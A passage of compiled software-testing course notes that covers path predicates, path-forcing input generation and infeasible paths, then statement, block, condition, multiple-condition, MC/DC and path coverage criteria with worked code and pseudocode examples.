value[i] != -999 ≡ True
value[i] >= MIN ≡ True
value[i] <= MAX ≡ True
ti < AS ≡ False
tv > 0 ≡ True

Figure 4.11 Path predicate for path in Figure 4.10.


• We must know whether the individual component predicates of a path predicate evaluate to true or false in order to generate path-forcing inputs.

4. Predicate Interpretation: The path predicate shown in Figure 4.11 is composed of elements of the input vector <value[], AS, MIN, MAX>, a vector of local variables <i, ti, tv>, and the constant -999. The local variables are not visible outside a function but are used to

• hold intermediate results,

• point to array elements, and

• control loop iterations.

In other words, they play no role in selecting inputs that force the paths to execute. Therefore, we can easily substitute all the local variables in a predicate with the elements of the input vector by using the idea of symbolic substitution. Let us consider the method shown in Figure 4.12. The input vector for the method in Figure 4.12 is given by <x1, x2>. The method defines a local variable y and also uses the constants 7 and 0.

The predicate

x1 + y >= 0

can be rewritten as

x1 + x2 + 7 >= 0

by symbolically substituting y with x2 + 7. The rewritten predicate

x1 + x2 + 7 >= 0

has been expressed solely in terms of the input vector <x1, x2> and the constant vector <0, 7>. Thus, predicate interpretation is defined as the process of symbolically substituting operations along a path in order to express the predicates solely in terms of the input vector and a constant vector.

In a CFG, there may be several different paths leading up to a decision point from the initial node, with each path doing different computations. Therefore, a predicate may have different interpretations depending on how control reaches the predicate under consideration.

public static int SymSub(int x1, int x2) {
    int y;
    y = x2 + 7;
    if (x1 + y >= 0)
        return (x2 + y);
    else
        return (x2 - y);
}

Figure 4.12 Method in Java to explain symbolic substitution [11].
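For instance (a worked example of our own), the inputs x1 = 0, x2 = 0 make the interpreted predicate x1 + x2 + 7 >= 0 evaluate to 7 >= 0, which is true, thereby forcing the true branch of SymSub(), whereas x1 = -10, x2 = 0 make it evaluate to -3 >= 0, which is false, forcing the false branch. The interpreted predicate thus directly yields path-forcing inputs.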


5. Path Predicate Expression: An interpreted path predicate is called a path predicate expression. A path predicate expression has the following properties:

• It is void of local variables and is solely composed of elements of the input vector and possibly a vector of constants.

• It is a set of constraints constructed from the elements of the input vector and possibly a vector of constants.

• Path-forcing input values can be generated by solving the set of constraints in a path predicate expression.

• If the set of constraints cannot be solved, there exists no input which can cause the selected path to execute. In other words, the selected path is said to be infeasible.

• An infeasible path does not imply that one or more components of a path predicate expression are unsatisfiable. It simply means that the total combination of all the components in a path predicate expression is unsatisfiable.

• Infeasibility of a path predicate expression suggests that one consider other paths in an effort to meet a chosen path selection criterion.

Example. Consider the path shown in Figure 4.10 from the CFG of Figure 4.7. Table 4.7 shows the nodes of the path in column 1, the corresponding description of each node in column 2, and the interpretation of each node in column 3. The intended evaluation of each interpreted predicate can be found in column 1 of the same row.

TABLE 4.7 Interpretation of Path Predicate of Path in Figure 4.10

Node    Node Description                        Interpreted Description
1       Input vector: <value[], AS, MIN, MAX>
2       i = 0, ti = 0, tv = 0, sum = 0
3(T)    ti < AS                                 0 < AS
4(T)    value[i] != -999                        value[0] != -999
5       ti++                                    ti = 0 + 1 = 1
6(T)    value[i] >= MIN                         value[0] >= MIN
7(T)    value[i] <= MAX                         value[0] <= MAX
8       tv++                                    tv = 0 + 1 = 1
        sum = sum + value[i]                    sum = 0 + value[0] = value[0]
9       i++                                     i = 0 + 1 = 1
3(F)    ti < AS                                 1 < AS
10(T)   tv > 0                                  1 > 0
12      av = (double)sum/tv                     av = (double)value[0]/1
13      return(av)                              return(value[0])

Note: The entries marked (T) or (F) in column 1 are the interpreted predicates.

We show the path predicate expression of the path under consideration in Figure 4.13 for the sake of clarity. The rows of Figure 4.13 have been obtained from Table 4.7 by combining each interpreted predicate in column 3 with its intended evaluation in column 1. Now the reader may compare Figures 4.11 and 4.13 to note that the predicates in Figure 4.13 are interpretations of the corresponding predicates in Figure 4.11.

Example. We show in Figure 4.14 an infeasible path appearing in the CFG of Figure 4.7. The path predicate and its interpretation are shown in Table 4.8, and the path predicate expression is shown in Figure 4.15. The path predicate expression is unsolvable because the constraint 0 > 0 ≡ True is unsatisfiable. Therefore, the path shown in Figure 4.14 is an infeasible path.

0 < AS ≡ True ........ (1)
value[0] != -999 ≡ True ........ (2)
value[0] >= MIN ≡ True ........ (3)
value[0] <= MAX ≡ True ........ (4)
1 < AS ≡ False ........ (5)
1 > 0 ≡ True ........ (6)

Figure 4.13 Path predicate expression for path in Figure 4.10.

1-2-3(T)-4(F)-10(T)-12-13.

Figure 4.14 Another example path from Figure 4.7.

TABLE 4.8 Interpretation of Path Predicate of Path in Figure 4.14

Node    Node Description                        Interpreted Description
1       Input vector: <value[], AS, MIN, MAX>
2       i = 0, ti = 0, tv = 0, sum = 0
3(T)    ti < AS                                 0 < AS
4(F)    value[i] != -999                        value[0] != -999
10(T)   tv > 0                                  0 > 0
12      av = (double)sum/tv                     av = (double)0/0
13      return(av)                              return((double)0/0)

Note: The entries marked (T) or (F) in column 1 are the interpreted predicates. (Along this path the loop body is never entered, so sum remains 0 at node 12.)


0 < AS ≡ True ........ (1)
value[0] != -999 ≡ False ........ (2)
0 > 0 ≡ True ........ (3)

Figure 4.15 Path predicate expression for path in Figure 4.14.

AS = 1
MIN = 25
MAX = 35
value[0] = 30

Figure 4.16 Input data satisfying the constraints of Figure 4.13.

6. Generating Input Data from Path Predicate Expression: We must solve the corresponding path predicate expression in order to generate input data which can force a program to execute a selected path. Let us consider the path predicate expression shown in Figure 4.13. We observe that constraint 6 is always satisfied. Constraints 1 and 5 must be solved together to obtain AS = 1. Similarly, constraints 2, 3, and 4 must be solved together. We note that MIN <= value[0] <= MAX and value[0] != -999. Therefore, we have many choices for selecting the values of MIN, MAX, and value[0]. An instance of a solution of the constraints of Figure 4.13 is shown in Figure 4.16.
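To make the constraint-solving step concrete, the following small C program (an illustrative addition, not from the original text; the search ranges are arbitrary choices of ours) finds one path-forcing input by brute-force search over the constraints of Figure 4.13:

#include <stdio.h>

int main(void) {
    /* Constraints (1) and (5): 0 < AS and not(1 < AS), hence AS == 1. */
    for (int AS = 0; AS <= 5; AS++) {
        if (!((0 < AS) && !(1 < AS)))
            continue;
        /* Constraints (2)-(4): MIN <= value[0] <= MAX, value[0] != -999. */
        for (int MIN = 0; MIN <= 40; MIN++)
            for (int MAX = MIN; MAX <= 40; MAX++)
                for (int v0 = MIN; v0 <= MAX; v0++)
                    if (v0 != -999) {
                        /* Constraint (6), 1 > 0, always holds. */
                        printf("AS=%d MIN=%d MAX=%d value[0]=%d\n",
                               AS, MIN, MAX, v0);
                        return 0; /* report one solution and stop */
                    }
    }
    return 0;
}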

4.7 EXAMPLES OF TEST DATA SELECTION

We give examples of selected test data to achieve complete statement and branch coverage. We show four sets of test data in Table 4.9. The first two data sets cover all statements of the CFG in Figure 4.7. However, we need all four sets of test data for complete branch coverage.

TABLE 4.9 Test Data for Statement and Branch Coverage

                      Input Vector
Test Data Set   AS   MIN   MAX   value[]
1               1    5     20    [10]
2               1    5     20    [-999]
3               1    5     20    [4]
4               1    5     20    [25]

If we execute the method ReturnAverage shown in Figure 4.6 with the four sets of test input data shown in Table 4.9, then each statement of the method is executed at least once, and every Boolean condition evaluates once to true and once to false. We have thoroughly tested the method in the sense of complete branch coverage. However, it is possible to introduce simple faults in the method which can go undetected when the method is executed with the above four sets of test data. Two examples of fault insertion are given below.

Example. We replace the correct statement

av = (double) sum/tv;

with a faulty statement

av = (double) sum/ti;

in the method. Here the fault is that the method divides the sum by the total number of inputs, denoted by ti, rather than by the total number of valid inputs, denoted by tv.

Example. We replace the correct statement

sum = sum + value[i];

with a faulty statement

sum = value[i];

in the method. Here the fault is that the method no longer computes the sum of all the valid inputs in the array. In spite of the fault, the first set of test data produces the correct result, because the array contains a single valid element and the two statements then compute the same sum; this is an instance of coincidental correctness.

The above two examples of faults lead us to the following conclusions:

• One must generate test data to satisfy certain selection criteria, because those selection criteria identify the aspects of a program that we want to cover.

• Additional tests, which are much longer than the simple tests generated to meet coverage criteria, must be generated after the coverage criteria have been met.

• Given a set of test data for a program, we can inject faults into the program which go undetected by those test cases.

4.8 CONTAINING INFEASIBLE PATHS

Woodward, Hedley, and Hennell [12] have identified some practical problems in applying the idea of path testing. First, a CFG may contain a very large number of paths; therefore, the immediate challenge is to decide which paths to select to derive test cases. Second, it may not be feasible to execute many of the selected paths. Thus, it is useful to apply a path selection strategy: first, select as many short paths as feasible; next, choose longer paths to achieve better coverage of statements, branches, and predicates. A large number of infeasible paths in a CFG complicate the process of test selection. To simplify path-based unit testing, it is useful to reduce the number of infeasible paths in a program unit through language design, program design, and program transformation. Brown and Nelson [13] have demonstrated the possibility of writing code with no infeasible paths.

Bertolino and Marre [14] have given an algorithm to generate a set of paths that covers all the branches of a CFG while reducing the number of infeasible paths in the chosen set. Their algorithm is based on the idea of a reduced flow graph, called a ddgraph. The algorithm uses the concepts of dominance and implications among the arcs of a ddgraph.

Yates and Malevris [15] have suggested a strategy to reduce the number of infeasible paths in a set of paths to achieve branch coverage. They suggest selecting a path cover, that is, a set of paths, whose constituent paths each involve a minimum number of predicates. On the contrary, if a path involves a large number of predicates, it is less likely that all the predicates simultaneously hold, thereby making the path infeasible. They have statistically demonstrated the efficacy of the strategy.

McCabe's [16] cyclomatic complexity measure (Table 3.3) gives an interesting graph-theoretic interpretation of a program flow graph. If we select as many paths as the cyclomatic complexity of a flow graph, it is likely that a few of the constructed paths will be infeasible. The above discussion leads us to conclude that though the ideas of statement coverage and branch coverage appear simple and straightforward, it is not easy to fully achieve those coverage criteria even for small programs.

4.9 SUMMARY

The notion of a path in a program unit is a fundamental concept. Assuming that a program unit is a function, a path is an executable sequence of instructions from the start of execution of the function to a return statement in the function. If there is no branching condition in a program unit, then there is just one path in the function. Generally, there are many branching conditions in a program unit, and thus there are numerous paths. One path differs from another path by at least one instruction. A path may contain one or more loops, but, ultimately, a path is expected to terminate its execution. Therefore, a path is of finite length in terms of the number of instructions it executes. One can have a graphical representation of a program unit, called a control flow graph, to capture the concept of control flow in the program unit.

Each path corresponds to a distinct behavior of the program unit, and therefore we need to test each path with at least one test case. If there are a large number of paths in a program, a programmer may not have enough time to test all the paths. Therefore, there is a need to select a few paths by using some path selection criteria. A path selection criterion allows us to select a few paths to achieve a certain kind of coverage of program units. Some well-known coverage metrics are statement coverage, branch coverage, and predicate coverage. A certain number of paths are chosen from the CFG to achieve a desired degree of coverage of a program unit. At an abstract level, each path is composed of a sequence of predicates and assignment (computation) statements. The predicates can be functions of local variables, global variables, and constants, and these are called path predicates. All the predicates along the path must evaluate to true when control reaches them for a path to be executable. One must select inputs, called path-forcing inputs, such that the path predicates evaluate to true in order to be able to execute the path. The process of selecting path-forcing inputs involves transforming the path predicates into a form that is void of local variables. Such a form of path predicates is called a path predicate expression. A path predicate expression is solely composed of the input vector and possibly a vector of constants. One can generate values of the input vector, which is considered as a test case, to exercise a path by solving the corresponding path predicate expression. Tools are being designed for generating test inputs from program units.

If a program unit makes function calls, it is possible that the path predicates are functions of the values returned by those functions. In such a case, it may be difficult to solve a path predicate expression to generate test cases. Path testing is more applicable to lower level program units than to upper level program units containing many function calls.

Control flow graph : Reference 2

Coverages

Test coverage measures the amount of testing performed by a set of tests. Wherever we can count things and can tell whether or not each of those things has been tested by some test, we can measure coverage; this measure is known as test coverage.

The basic coverage measure is: coverage = (number of coverage items exercised / total number of coverage items) × 100%, where the "coverage item" is whatever we have been able to count and see whether a test has exercised or used this item.

There is a danger in using a coverage measure: 100% coverage does not mean 100% tested. Coverage techniques measure only one dimension of a multi-dimensional concept. Two different test cases may achieve exactly the same coverage, but the input data of one may find an error that the input data of the other does not.
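A tiny C illustration (our own, not from the source): both tests below achieve identical statement coverage of div_int(), yet only the second one exposes the divide-by-zero fault.

#include <stdio.h>

/* Faulty on purpose: no guard against b == 0. */
static int div_int(int a, int b) {
    return a / b;
}

int main(void) {
    printf("%d\n", div_int(4, 2)); /* exercises every statement and passes  */
    printf("%d\n", div_int(4, 0)); /* same coverage, but the fault shows up */
    return 0;
}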

Benefits of code coverage measurement:

• It creates additional test cases to increase coverage
• It helps in finding areas of a program not exercised by a set of test cases
• It helps in determining a quantitative measure of code coverage, which indirectly measures the quality of the application or product.

Drawbacks of code coverage measurement:

• One drawback of code coverage measurement is that it measures coverage of what has been written, i.e. the code itself; it cannot say anything about the software that has not been written.

• If a specified function has not been implemented or a function was omitted from the specification, then structure-based techniques cannot say anything about it: they only look at the structure which is already there.

The purpose of test coverage

Test coverage is an estimate utilized in software testing. It gives details about the level to which the written code of an application has been tested.

It is a form of white-box testing, since it examines the code itself rather than only the external behavior. Today the importance of test coverage is extensive in the field of software engineering. Test coverage methods were among the first methods discovered for efficient software testing.


Basic coverage criteria

To measure how well the program is exercised by a test suite, one or more coverage criteria are used. There are a number of coverage criteria, the main ones being:

• Function coverage - Has each function in the program been executed (i.e., called at least once)?

• Statement coverage - Has each line of the source code been executed?

• Condition coverage - Has each evaluation point (such as a true/false decision) been executed?

• Path coverage - Has every possible route through a given part of the code been executed?

• Entry/exit coverage - Has every possible call and return of the function been executed?

• Branch coverage - Has every branch of every control structure been executed?

Safety-critical applications are often required to demonstrate that testing achieves 100% of some form of code coverage. Some of the coverage criteria above are related. For instance, path coverage implies condition, statement and entry/exit coverage. Statement coverage does not imply condition coverage, as the code (in the C programming language) below shows:

#include <stdio.h> /* for printf */

void foo(int bar) {
    printf("This is ");
    if (bar <= 0) {
        printf("not ");
    }
    printf("a positive integer.\n");
    return;
}

If the function foo were called with variable bar set to -1, statement coverage would be achieved. Condition coverage, however, would not.
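For completeness, a small driver (an illustrative addition, not part of the quoted example) shows a two-test suite that exercises both outcomes of the condition and therefore achieves condition coverage as well:

int main(void) {
    foo(-1); /* bar <= 0 evaluates to true  */
    foo(1);  /* bar <= 0 evaluates to false */
    return 0;
}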


Full path coverage, of the type described above, is usually impractical or impossible. Any module with a succession of n decisions in it can have up to 2^n paths within it; loop constructs can result in an infinite number of paths. Many paths may also be infeasible, in that there is no input to the program under test that can cause that particular path to be executed. However, a general-purpose algorithm for identifying infeasible paths has been proven to be impossible (such an algorithm could be used to solve the halting problem). Techniques for practical path coverage testing instead attempt to identify classes of code paths that differ only in the number of loop executions; to achieve "basis path" coverage the tester must cover all the path classes.

Advantage and disadvantage of test coverage

Advantage

• It builds extra test cases to enhance coverage.

• It assists in discovering areas of an application not exercised by a group of test cases.

• It assists in determining a quantitative measure of test coverage, which ultimately indicates the quality of the software application.

Disadvantage

• One problem of test coverage measurement is that it measures coverage of what has been written down, that is, the code itself; it cannot declare anything regarding the application that has not been written down.

• If a particular method has not been implemented or a method was omitted from the requirement, then structure-based methods cannot say anything about it; they simply observe a structure which is already present.

Test Coverage is an important indicator of software quality and an essential part of software maintenance. It helps in evaluating the effectiveness of testing by providing data on different coverage items. It is a useful tool for finding untested parts of a code base. Test coverage is also called code coverage in certain cases.

Test coverage can help in monitoring the quality of testing and can assist in directing test generators to create test cases that cover areas which have not been tested. It provides a quantitative measure of test coverage, which is an indirect measure of quality, and it identifies redundant test cases that do not increase coverage.

The output of coverage measurement can be used in several ways to improve the testing process:

• Traceability between the requirements and test cases can be established by measuring the Test Coverage


• Change tracking and impact analysis become effective when a proper test coverage mechanism is in place

• Defect leakage will be prevented with proper test coverage

• Gaps in requirements, test cases, and defects at the unit level can be found easily

Benefits of Test Coverage

• Defect prevention at early stages of the project life cycle
• It creates additional test cases to increase coverage
• Better ROI through a reduction in UAT defects and production defects
• It helps in finding areas of a program not exercised by a set of test cases
• Time, cost, and scope remain under control
• The testing life cycle becomes smoother by supporting a risk-based testing approach
• It helps in determining a quantitative measure of code coverage, which indirectly measures the quality of the application or product

Test coverage tools

The test coverage tools are used to locate application functionality: one simply exercises the functionality of interest, and the test coverage tool indicates what part of the application code is executed. This is a very effective way to locate functionality in a large, poorly understood system. Coverage tools also help in checking how thoroughly the testing has been done.

Features or characteristics of coverage measurement tools are as follows:

• To identify coverage items (instrumenting the code)
• To calculate the percentage of coverage items that were exercised by a set of tests
• To report coverage items that have not been exercised yet
• To generate stubs and drivers (if part of a unit test framework)

It is very important to know that the coverage tools only measure the coverage of the items that they can identify. Just because your tests have achieved 100% statement coverage, this does not mean that your software is 100% tested!
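As a rough illustration with one widely used free tool, GCC's gcov (assuming a C source file foo.c whose main() runs the tests; the report format varies by version):

gcc --coverage foo.c -o foo   # compile with coverage instrumentation
./foo                         # run the tests; execution counts are recorded
gcov foo.c                    # report the percentage of lines executed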


Coverages: block, conditions, multiple conditions, MC/DC, path

statement coverage

• Statement coverage is also known as line coverage or segment coverage.
• Statement coverage can be achieved while exercising only the true outcome of each decision.
• Through statement coverage we can identify which statements are executed and where the code is never reached.
• In this process each and every line of code needs to be checked and executed.

Advantages of statement coverage:

• It verifies what the written code is expected to do and not to do.
• It measures the quality of the code written.
• It checks the flow of different paths in the program and ensures whether those paths are tested or not.

Disadvantages of statement coverage:

• It cannot test the false conditions.
• It does not report whether a loop reaches its termination condition.
• It does not understand the logical operators.

The statement coverage can be calculated as shown below:

Statement coverage = (number of statements exercised / total number of statements) x 100%

To understand statement coverage better, let us take an example, written in pseudo-code. It is not in any specific programming language, but it should be readable and understandable even if you have not done any programming yourself.

Consider code sample 4.1 :

READ X
READ Y
IF X > Y THEN Z = 0
ENDIF

Code sample 4.1

To achieve 100% statement coverage of this code segment just one test case is required, one which ensures that variable X contains a value that is greater than the value of variable Y, for example, X = 12 and Y = 10. Note that here we are doing structural test design first, since we are choosing our input values in order to ensure statement coverage.

Now, let’s take another example where we will measure the coverage first. In order to simplify the example, we will regard each line as a statement. A statement may be on a single line, or it may be spread over several lines. One line may contain more than one statement, just one statement, or only part of a statement. Some statements can contain other statements inside them. In code sample 4.2, we have two read statements, one assignment statement, and then one IF statement on three lines, but the IF statement contains another statement (print) as part of it.

1 READ X
2 READ Y
3 Z = X + 2*Y
4 IF Z > 50 THEN
5    PRINT large Z
6 ENDIF

Code sample 4.2

Although it isn’t completely correct, we have numbered each line and will regard each line as a statement. Let’s analyze the coverage of a set of tests on our six-statement program:

TEST SET 1
Test 1_1: X = 2, Y = 3
Test 1_2: X = 0, Y = 25
Test 1_3: X = 47, Y = 1

Which statements have we covered?

• In Test 1_1, the value of Z will be 8, so we will cover the statements on lines 1 to 4 and line 6.

• In Test 1_2, the value of Z will be 50, so we will cover exactly the same statements as Test 1_1.

• In Test 1_3, the value of Z will be 49, so again we will cover the same statements.

Since we have covered five out of six statements, we have 83% statement coverage (with three tests). What test would we need in order to cover statement 5, the one statement that we haven’t exercised yet? How about this one:

Test 1_4: X = 20, Y = 25

This time the value of Z is 70, so we will print ‘Large Z’ and we will have exercised all six of the statements, so now statement coverage = 100%. Notice that we measured coverage first, and then designed a test to cover the statement that we had not yet covered.

Note that Test 1_4 on its own is more effective than the first three tests together, since it achieves 100% statement coverage by itself. Taking Test 1_4 on its own is also more efficient than the set of four tests, since it uses only one test instead of four. Being both more effective and more efficient is the mark of a good test technique.


In this type of testing the code is executed in such a manner that every statement of the application is executed at least once. It helps in assuring that all the statements execute without unexpected side effects. This method is also called line coverage or segment coverage.

In statement coverage testing we make sure that all of our code blocks are executed, and we can also identify which blocks failed to execute.

Bugs may still remain after all the blocks execute without failure, because statement coverage does not check every condition within a block. It is only a basic check performed after coding, using dynamic analysis. To check every condition we need branch and path coverage testing.

There are several free tools available for conducting statement coverage testing.

block coverage

A variant of statement coverage is block coverage, which provides the same measurement based on code blocks instead of statements. Since every code block has a known set of statements, there is a one-to-one relationship between statement coverage and block coverage from a test quality point of view.


A basic block is a sequence of consecutive statements that has exactly one entry point and one exit point.

The block coverage of a test set T with respect to (P, R) is computed as Bc/(Be - Bi), where Bc is the number of blocks covered, Bi is the number of unreachable blocks, and Be is the total number of blocks in the program, i.e., the size of the block coverage domain.

T is considered adequate with respect to the block coverage criterion if the block coverage of T with respect to (P, R) is 1.
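As a small worked example of the formula, with invented counts: if a program has Be = 12 blocks in total, of which Bi = 2 are unreachable, and a test set T covers Bc = 8 blocks, then the block coverage of T is 8 / (12 - 2) = 0.8, so T is not yet adequate with respect to the block coverage criterion.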

condition coverage

What is Condition Coverage Testing?

Condition coverage is also known as predicate coverage; it requires that each Boolean sub-expression has been evaluated to both TRUE and FALSE.

Example

if ((A || B) && C)
{
    << Few Statements >>
}
else
{
    << Few Statements >>
}

Result

In order to ensure complete condition coverage for the above example, A, B and C should each be evaluated at least once to "true" and at least once to "false".

So, in our example, the following 3 tests would be sufficient for 100% condition coverage:

A = true  | B = not evaluated | C = false
A = false | B = true          | C = true
A = false | B = false         | C = not evaluated


• This is closely related to decision coverage but has better sensitivity to the control flow.

• However, full condition coverage does not guarantee full decision coverage.
• Condition coverage reports the true or false outcome of each condition.
• Condition coverage measures the conditions independently of each other.

Other control-flow code-coverage measures include linear code sequence and jump (LCSAJ) coverage, multiple condition coverage (also known as condition combination coverage), and condition determination coverage (also known as modified condition/decision coverage, MC/DC). This last technique requires the coverage of all conditions that can affect or determine the decision outcome.

Condition coverage, also known as predicate coverage, is defined over Boolean expressions: it checks whether every Boolean sub-expression has been evaluated to both TRUE and FALSE.

Let us take an example to explain Condition Coverage

IF (X && Y)

In order to satisfy condition coverage for this pseudo-code, the following tests will be sufficient:

TEST 1: X = TRUE,  Y = FALSE
TEST 2: X = FALSE, Y = TRUE

Note: 100% condition coverage does not guarantee 100% decision coverage.
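A minimal C sketch of this note (invented for illustration): across the two tests above, X and Y each take both truth values, yet the decision X && Y is false both times, so the true branch of the decision is never taken.

#include <stdio.h>

int main(void)
{
    int tests[2][2] = { {1, 0}, {0, 1} };  /* TEST 1 and TEST 2 */
    for (int i = 0; i < 2; i++) {
        int X = tests[i][0], Y = tests[i][1];
        /* Each condition sees both values across the two tests,
           but the decision is false in both cases. */
        printf("X=%d Y=%d -> (X && Y) = %d\n", X, Y, X && Y);
    }
    return 0;
}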

Example of Condition coverage

Simple example

Assume we want to test the following code extract:

if ((A || B) && C)
{
    /* instructions */
}
else
{
    /* instructions */
}


where A, B and C represent atomic Boolean expressions (i.e., not divisible into other Boolean sub-expressions).

In order to ensure condition coverage for this example, A, B and C should each be evaluated at least once to "true" and at least once to "false" during the tests.

So, in our example, the following 3 tests would be sufficient to satisfy condition coverage:

1. A = true / B = not evaluated / C = false
2. A = false / B = true / C = true
3. A = false / B = false / C = not evaluated

More complex example

Assume we replace the condition ((A || B) && C) by (((u == 0) || (x > 5)) && ((y < 6) || (z == 0))).

Full coverage of this decision would consist of building the truth table of all 16 combinations of the four atomic conditions and testing each combination. To ensure condition coverage, on the other hand, it suffices to test (for example) just 3 well-chosen combinations, analogous to the 3 listed for the simpler example above.

When a boolean expression is evaluated it can be useful to ensure that all the terms in the expression are exercised. For example:

a if $x || $y;


To achieve full condition coverage, this expression should be evaluated with $x and $y set to each of the four combinations of values they can take.

Condition coverage gets complicated, and difficult to achieve, as the expression gets complicated. For this reason there are a number of different ways of reporting condition coverage which try to ensure that the most important combinations are covered without worrying about less important combinations.

Expressions which are not part of a branching construct should also be covered:

$z = $x || $y;

Condition coverage is also known as expression, condition-decision and multiple decision coverage.

multiple condition coverage

Multiple condition coverage is also known as condition combination coverage.


In multiple condition coverage, for each decision, all the combinations of conditions should be evaluated.

Let's take an example:

if (A||B) then print C

Here we have 2 Boolean expressions A and B, so the test set for Multiple Condition Coverage will be:

TEST CASE 1: A = TRUE,  B = TRUE
TEST CASE 2: A = TRUE,  B = FALSE
TEST CASE 3: A = FALSE, B = TRUE
TEST CASE 4: A = FALSE, B = FALSE

As you can see, there are 4 test cases for 2 conditions. Similarly, there will be 8 test cases for 3 conditions.

So you can say that if there are n conditions, there will be 2^n tests.

This criterion requires that all combinations of conditions inside each decision are tested. For example, the code fragment from the previous section will require eight tests (a small sketch that enumerates them mechanically follows the list):

• a=false, b=false, c=false
• a=false, b=false, c=true
• a=false, b=true, c=false
• a=false, b=true, c=true
• a=true, b=false, c=false
• a=true, b=false, c=true
• a=true, b=true, c=false
• a=true, b=true, c=true
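As a minimal sketch of how the 2^n combinations can be enumerated mechanically (the function check() and its decision are invented for illustration):

#include <stdio.h>

/* Hypothetical decision under test: (a || b) && c */
static int check(int a, int b, int c) { return (a || b) && c; }

int main(void)
{
    /* Enumerate all 2^3 = 8 combinations of the three conditions. */
    for (int mask = 0; mask < 8; mask++) {
        int a = (mask >> 2) & 1, b = (mask >> 1) & 1, c = mask & 1;
        printf("a=%d b=%d c=%d -> decision=%d\n", a, b, c, check(a, b, c));
    }
    return 0;
}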


Advantages of condition/multiple condition coverage:

1. It is very thorough testing, and bugs are normally found by this kind of testing.

Disadvantages:

1. If the decision branch contains many sub-expressions or very complex Boolean expressions, the tester will have to define a large number of test cases.

MC/DC

The modified condition/decision coverage (MC/DC) criterion requires all of the following during testing:

1. Each entry and exit point is invoked.
2. Each decision takes every possible outcome.
3. Each condition in a decision takes on every possible outcome.
4. Each condition in a decision is shown to independently affect the outcome of the decision.


Independence of a condition is shown by varying only that condition while holding all the others fixed and observing that the decision outcome changes.

Modified condition/decision coverage enhances the condition/decision coverage criteria by requiring that each condition be shown to independently affect the outcome of the decision. This kind of testing is performed on mission-critical applications whose failure might lead to death, injury, or monetary loss.

Designing tests for modified condition/decision coverage requires a more thoughtful selection of test cases, carried out on a standalone module or on integrated components.

Characteristics of modified condition/decision coverage:

• Every entry and exit point in the program has been invoked at least once.
• Every decision has been tested for all possible outcomes of the branch.
• Every condition in a decision in the program has taken all possible outcomes at least once.
• Every condition in a decision has been shown to independently affect that decision's outcome.

MC/DC is short for modified condition/decision coverage; the name multiple condition decision coverage is sometimes used for the same criterion.

In MC/DC each condition should be evaluated at least once, and each condition must be shown to affect the decision outcome independently.

Example for MC/DC

if {(X or Y) and Z} then

To satisfy condition coverage, each Boolean sub-expression X, Y and Z in the above statement should be evaluated to TRUE and to FALSE at least once.


The TEST CASES for condition coverage will be:

TEST CASE 1: X = TRUE,  Y = TRUE,  Z = TRUE
TEST CASE 2: X = FALSE, Y = FALSE, Z = FALSE

To satisfy the decision coverage we need to ensure that the IF statement evaluates to TRUE and FALSE at least once. So the test set will be:

TEST CASE 1: X = TRUE,  Y = TRUE,  Z = TRUE
TEST CASE 2: X = FALSE, Y = FALSE, Z = FALSE

However, for MC/DC the above test cases are not sufficient, because in MC/DC each Boolean variable should be evaluated to TRUE and FALSE at least once and should also be shown to affect the decision outcome independently.

So to ensure MC/DC we need 4 more test cases.

TEST CASE 3: X = FALSE, Y = FALSE, Z = TRUE
TEST CASE 4: X = FALSE, Y = TRUE,  Z = TRUE
TEST CASE 5: X = FALSE, Y = TRUE,  Z = FALSE
TEST CASE 6: X = TRUE,  Y = FALSE, Z = TRUE

In test case 3 the decision outcome is FALSE.
In test case 4 the decision outcome is TRUE.
In test case 5 the decision outcome is FALSE.
In test case 6 the decision outcome is TRUE.

So in the above test cases you can see that changing the value of a single Boolean variable changed the decision outcome.

The combination of function coverage and branch coverage is sometimes also called decision coverage. This criterion requires that every point of entry and exit in the program has been invoked at least once, and that every decision in the program has taken all possible outcomes at least once. In this context a decision is a Boolean expression composed of conditions and zero or more Boolean operators. This definition is not the same as branch coverage; however, some do use the term decision coverage as a synonym for branch coverage.

Condition/decision coverage requires that both decision and condition coverage be satisfied. However, for safety-critical applications (e.g., avionics software) it is often required that modified condition/decision coverage (MC/DC) be satisfied. This criterion extends the condition/decision criteria with the requirement that each condition should affect the decision outcome independently. For example, consider the following code:

if (a or b) and c then


The condition/decision criteria will be satisfied by the following set of tests:

• a=true, b=true, c=true
• a=false, b=false, c=false

However, the above test set will not satisfy modified condition/decision coverage, since in the first test the value of 'b', and in the second test the value of 'c', would not influence the output. So the following test set is needed to satisfy MC/DC (a small sketch that checks the independence of each condition follows the list):

• a=false, b=false, c=true
• a=true, b=false, c=true
• a=false, b=true, c=true
• a=false, b=true, c=false
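To make the independence requirement concrete, here is a small C sketch (invented for illustration, not from the text) that mechanically confirms, for each condition of (a or b) and c, that the four tests above contain a pair differing only in that condition and producing different decision outcomes:

#include <stdio.h>

static int decision(int a, int b, int c) { return (a || b) && c; }

int main(void)
{
    /* The four MC/DC tests from the text, as {a, b, c} triples. */
    int t[4][3] = { {0,0,1}, {1,0,1}, {0,1,1}, {0,1,0} };
    /* For each condition, find a pair of tests that differ only in
       that condition and produce different decision outcomes. */
    for (int cond = 0; cond < 3; cond++)
        for (int i = 0; i < 4; i++)
            for (int j = i + 1; j < 4; j++) {
                int diff = 0;
                for (int k = 0; k < 3; k++)
                    if (t[i][k] != t[j][k]) diff += (k == cond) ? 1 : 4;
                /* diff == 1 means the tests differ exactly at 'cond'. */
                if (diff == 1 &&
                    decision(t[i][0], t[i][1], t[i][2]) !=
                    decision(t[j][0], t[j][1], t[j][2]))
                    printf("condition %d shown independent by tests %d and %d\n",
                           cond, i + 1, j + 1);
            }
    return 0;
}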

path coverage

In path coverage, test cases are executed in such a way that every path is exercised at least once: all possible control paths are taken, including loop paths taken zero times, once, and multiple (ideally, the maximum number of) times. In the path coverage technique, test cases are prepared based on the logical complexity measure of a procedural design, and every statement in the program is guaranteed to be executed at least once. Flow graphs, cyclomatic complexity, and graph metrics are used to arrive at the basis paths.

Path coverage represents yet another interesting measure. Conditional statements such as if-else and case create different paths in the design, and the applied stimulus diverts the flow of execution down a specific path.


Path coverage is considered to be more complete than branch coverage because it can detect errors related to the sequence of operations. The path taken is decided by the if-else statements: according to the applied stimulus, only the branch whose condition is satisfied executes, and the path is diverted accordingly. Path coverage is possible in always and function blocks; a path created by more than one block is not covered, and analyzing a path coverage report is not an easy task. The path coverage report of the example (the accompanying figure is not reproduced here) reads:

Path 1: 15,20  Not Covered
Path 2: 15,21  Not Covered
Path 3: 15,22  Not Covered
Path 4: 17,20  Not Covered
Path 5: 17,21  Covered
Path 6: 17,22  Not Covered

Total possible paths: 6
Total covered paths: 1
Path coverage percentage: 16.67% (1/6)

There are classes of errors which branch coverage cannot detect, such as:


